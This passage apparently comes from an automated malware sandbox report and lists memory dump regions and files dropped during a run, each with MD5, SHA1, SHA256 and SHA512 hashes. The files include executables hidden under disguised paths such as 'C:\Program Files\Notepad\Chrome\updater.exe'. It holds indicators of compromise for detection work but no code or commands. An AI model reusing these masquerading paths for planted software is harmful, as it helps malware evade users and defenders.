memory/2924-472-0x000002404C500000-0x000002404C576000-memory.dmp
memory/2152-473-0x00000000070F0000-0x000000000712C000-memory.dmp
C:\Users\Admin\AppData\Roaming\bdctbfc
| MD5 | 4157cd24e2108b88002383f9d4f3dd83 |
| SHA1 | 11a8ab912c936ccad5d4dfd3281bbc24915d0872 |
| SHA256 | c1dda0529a9efe55682507fafeb6898916582b298c661848087379451485cc5c |
| SHA512 | 5581f088b4de893157bcdd49f35207f4c72aefbf538179868605b4e80823b968b97d61803e79fb4fe5b3ac519caeb5aea1f4c5b3dbc8edfcfb294f2a0727fada |
memory/2152-485-0x0000000007170000-0x00000000071AA000-memory.dmp
memory/2924-520-0x000002404BF70000-0x000002404BF80000-memory.dmp
memory/2152-523-0x0000000004690000-0x00000000046D6000-memory.dmp
memory/2152-526-0x00000000072E0000-0x00000000072F0000-memory.dmp
memory/2152-529-0x00000000072E0000-0x00000000072F0000-memory.dmp
memory/2924-535-0x000002404BF70000-0x000002404BF80000-memory.dmp
memory/2152-532-0x00000000072E0000-0x00000000072F0000-memory.dmp
memory/4172-621-0x0000000004990000-0x00000000049A0000-memory.dmp
memory/1568-623-0x000002404BF70000-0x000002404BF80000-memory.dmp
memory/1568-625-0x0000000002B70000-0x0000000002B7B000-memory.dmp
memory/4872-627-0x0000000002B70000-0x0000000002B7B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9661122c674f09a89f0b6cbb942e498e |
| SHA1 | 5ee36dacee0fd52696ca7fce8c85c431a79c5837 |
| SHA256 | f843f9104870fcd451b3e4726990fc6b9c16633077a9768b090e0d81e9891cab |
| SHA512 | b870c86d01aae4621e339a3e044ea5fc3a7411fb209eebc65dab8ee454690605b532ac3df126809dbb0648e51737d2548229afe7f9721b9a8686f9d67822c496 |
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
| MD5 | 3006b49f3a30a80bb85074c279acc7df |
| SHA1 | 728a7a867d13ad0034c29283939d94f0df6c19df |
| SHA256 | f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280 |
| SHA512 | e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f801daf957cae7b8d2e711318787281b |
| SHA1 | 13a8635ce2bea075d34da07613a63190182fd07d |
| SHA256 | f6725683d598f2a02b1894225d3d54e37c32cdd9b1ac57d0666ad00504779cb2 |
| SHA512 | 257233b850ed6cae6f7a6df5e0356ad8deb54abf56e8f21337cb02963f6010ba2693d937d36ff40f51c42f8e07ebed0ed8e93649ef7b21a096533e6acdafb7c9 |
C:\Program Files\Notepad\Chrome\updater.exe
| MD5 | 3006b49f3a30a80bb85074c279acc7df |
| SHA1 | 728a7a867d13ad0034c29283939d94f0df6c19df |
| SHA256 | f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280 |
| SHA512 | e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd |
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
| MD5 | 0f59853fb3b3a252e267e204024390c2 |
| SHA1 | e692c9d78613e7cac791559f4c8e1f7dd5c74c37 |
| SHA256 | dda2cf88b2ff2f785b1842db4e5c775f2c10b897d6e30905f1150c640f5d79c2 |
| SHA512 | 1bcb63516644524c4fd9fcccfd99849f9913c501e53c3c71e3fb90657f42c1e59cc9c2f9a56f39a3f4029216eed1d11d7228b3e01433203fa71a9b0457f2d31c |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 811d351aabd7b708fef7683cf5e29e15 |
| SHA1 | 06fd89e5a575f45d411cf4b3a2d277e642e73dbb |
| SHA256 | 0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18 |
| SHA512 | 702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 302a7c179ef577c237c5418fb770fd27 |
| SHA1 | 343ef00d1357a8d2ff6e1143541a8a29435ed30c |
| SHA256 | 9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f |
| SHA512 | f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699 |
C:\Program Files\Notepad\Chrome\updater.exe
| MD5 | 3006b49f3a30a80bb85074c279acc7df |
| SHA1 | 728a7a867d13ad0034c29283939d94f0df6c19df |
| SHA256 | f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280 |
| SHA512 | e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd |
C:\Program Files\Google\Libs\g.log
| MD5 | fdba80d4081c28c65e32fff246dc46cb |
| SHA1 | 74f809dedd1fc46a3a63ac9904c80f0b817b3686 |
| SHA256 | b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398 |
| SHA512 | b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29 |